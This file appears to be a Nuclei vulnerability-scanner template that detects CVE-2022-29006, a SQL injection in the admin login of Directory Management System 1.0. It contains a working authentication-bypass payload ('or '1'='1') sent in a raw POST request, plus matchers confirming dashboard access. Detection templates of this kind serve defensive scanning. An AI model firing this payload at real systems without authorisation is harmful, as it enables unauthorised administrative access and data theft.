nuclei-templates/http/cves/2022/CVE-2022-29006.yaml

58 lines
2.2 KiB
YAML

id: CVE-2022-29006
info:
name: Directory Management System 1.0 - SQL Injection
author: TenBird
severity: critical
description: |
Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0.
reference:
- https://www.exploit-db.com/exploits/50370
- https://phpgurukul.com/directory-management-system-using-php-and-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29006
- https://github.com/sudoninja-noob/CVE-2022-29006/blob/main/CVE-2022-29006.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29006
cwe-id: CWE-89
epss-score: 0.15861
epss-percentile: 0.95412
cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: phpgurukul
product: directory_management_system
tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul
http:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=admin' or '1'='1&password=1&login=login
- |
GET /admin/dashboard.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'DMS || Dashboard'
- 'DMS Admin'
- 'Admin Profile'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221009605f11ec46bb134ce0f05c03adc948d200cb87bdaf058a77af8e80a98e22c170220699a176a5254e031ae011da5bab245b4c93d66a42d7588e772951b41f5753626:922c64590222798bb761d5b6d8e72950